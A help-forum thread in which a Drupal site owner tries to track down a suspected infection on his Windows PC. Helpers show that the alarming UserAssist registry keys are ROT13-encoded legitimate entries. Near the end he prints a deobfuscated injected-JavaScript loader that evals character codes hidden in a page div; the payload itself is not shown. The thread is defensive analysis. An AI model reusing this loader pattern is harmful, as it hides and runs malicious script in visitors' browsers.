Virus affecting the UserAssist registry key, Internet Explorer and more

I got a virus from an infected Drupal website. I have Windows 8.1 in Administrator Mode.

The major sign of the virus is that if I open the website in question (which has now been disinfected) with Internet Explorer, I see a bunch of random characters and the source code includes some divs with obfuscated javascript.

I’ve ran several anti-virus scans (Avast, AVG, Panda), hijackthis, cccleaner, Malwarebytes, and Security Task Manager.

The only major thing they found were some InetCookies that were malicious and deleted. Since then, I’ve repeatedly emptied the Internet Explorer cache, run multiple scans (in safe mode, in bootup, in regular mode) and whenever I return to opening the website in IE it gives me the malicious code.

Eventually I ran tests with (sysinternals) Process Manager and was lucky to catch iexplore.exe writing some malicious registry keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

There are two standard keys: HRZR_PGYFRFFVBA and HRZR_PGYPHNPbhag:pgbe
(And if you do an internet search for them you will find other references to viruses).

And there are multiple random keys like
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist{BCB48336-4DDD-48FF-BB0B-D3190DACB3E2}\Count
P:\Hfref\Nqzvavfgengbe\NccQngn\Ybpny\Grzc\Cebpzba64.rkr

or
Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt

A smaller number of the keys are .yax files.

Now I can delete the keys, but when I reopen that website in IE, even if I am in Safe Mode (with Networking), they are created again.

I suspect a rootkit infection, but am unable to identify the cause.

I’ve spent a lot of time on this and would greatly appreciate any help.

I could post some logs - though I’m not sure if they are really useful.

My goal is to find the cause of this without having to reinstall Windows, as I want a solution that can be used by others who were infected that is easier than reinstalling.

The major sign of the virus is that if I open the website in question (which has now been disinfected) with Internet Explorer, I see a bunch of random characters and the source code includes some divs with obfuscated javascript.
That doesn't mean the site is infected. It can also be things are badly programmed.
I've ran several anti-virus scans (Avast, AVG, Panda), hijackthis, cccleaner, Malwarebytes, and Security Task Manager.
What did you want to check? Your system or the site ?
The only major thing they found were some InetCookies that were malicious and deleted.
Cookies themselfs are never malicious.

Follow the instructions and attach the logs to your next post:
https://forum.avast.com/index.php?topic=53253.0

It’s a Drupal website that I manage. I found five malicious scripts on it, deleted them, and installed the security upgrades.

I’m trying to find viruses on my home pc.

I did a search for “HRZR_” and found more bad registry keys:

HKEY_USERS\S-1-5-21-364787011-452331410-611592171-500\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

Now I’ll post some logs for Malewarebytes, Farbar, and aswmbr.

You are running Avast, AVG and Panda … two of them must go

Bitdefender is also installed.

http://blog.kaspersky.com/multiple-antivirus-programs-bad-idea/

Uninstalling a third-party antivirus software >> https://www.avast.com/faq.php?article=AVKB11#artTitle

Interesting, but not entirely convincing. I saw the fighting over viruses - not a big deal. The level of resources consumed by running multiple software was minimal (I’ve got a 4670k at 4.4 ghz with 16 gb RAM and SSD drives). My system has been totally stable. I’ve had problems with AVG protecting itself (and more critically I had to get the AVG removal tool because it managed to break itself at one point - but at that point it was just being a minor inconvenience taking up a bit of memory).

By contrast, by running multiple anti-virus products I have found things that my initial setup - Avast only - didn’t find.

That said, I’m willing to uninstall everything except Avast (or should I uninstall that as well). I can also rerun the tests though I’m guessing I won’t find anything.

Any comments about the damaging evidence that I’ve found in the registry?
Any comments about what the attachments that I submitted found (or really didn’t find)?

Did you decode the user assist keys ? http://www.nirsoft.net/utils/userassist_view.html

So I tried the UserAssistView tool and have attached the results.

Are the random characters that I’m seeing actually encoded?

It say it gets the value from this key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist

Does it properly handle sub-keys? My malicious content is under keys like this one:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

And it doesn’t look like UserAssistView is getting that - so I’m also attaching a registry export of the key.

I turned off all the anti-virus (except Avast) and re-ran the scans.

Could you resave userassist as ASNI please as the forum software has changed it to Unicode

Do you want the registry export from regedit or the UserAssistView one?

The user assist one as the reg export is OK

Ok I saved it in Ansi format.

8216C80C92C4E828 this one is related to HTML5

and the rest are all legitimate programmes

Removal though from the registry has done no harm… :slight_smile:

I can see no sign of malware on the system

I did some searching and it appears that Microsoft intentionally using Rot13 encryption on these registry entries. So that confirms what you’re saying.

Weird place to use encryption though :slight_smile:

Do you think it is possible to catch the virus in the act by using Process Monitor?

I’ve been using Process Monitor and opening the one website that gives the malicious code in IE. It’s challenging though because Process Monitor generates thousands of events per second.

I’m probably going to reinstall windows, but I’m concerned for everyone else who was infected - as I think most of them won’t reinstall. Either the virus is very good at hiding its malicious activity, or it failed to completely install itself.

Here is a copy of the malicious JS. Is there a way to decrypt it and figure out what it does?

I de-obfuscated the JS using http://ddecode.com/hexdecoder/ and some manual copying and pasting to build the variables:

var ahkslogfab=“(“bmatxzfmfky”).”;
var nmdssprzmetsjz=“constructor”;
var hrvalbnjzjmupz=“.apply(null,”;
var tiesfnjmajfml=“(”;
var vfoznywclt=“innerHTML”;
var tbkiibqoquvujjs=“document.getElementById”;
var ghztbjrizug=“String.fromCharCode”;
var bfxogwyyetrlupe=“)”;
var uedwjfoqfafn=“eval”;
var wfzaposdkyxmku=“.split(”,“))”;

[nmdssprzmetsjz][nmdssprzmetsjz](uedwjfoqfafn + tiesfnjmajfml + ghztbjrizug + hrvalbnjzjmupz + tbkiibqoquvujjs + ahkslogfab + vfoznywclt + wfzaposdkyxmku + bfxogwyyetrlupe)();

The result is this:
[constructor][constructor](eval(String.fromCharCode.apply(null,document.getElementById(bmatxzfmfky).innerHTML.split(,))();

So it is getting the unicode characters from the DIV and the executing eval on them.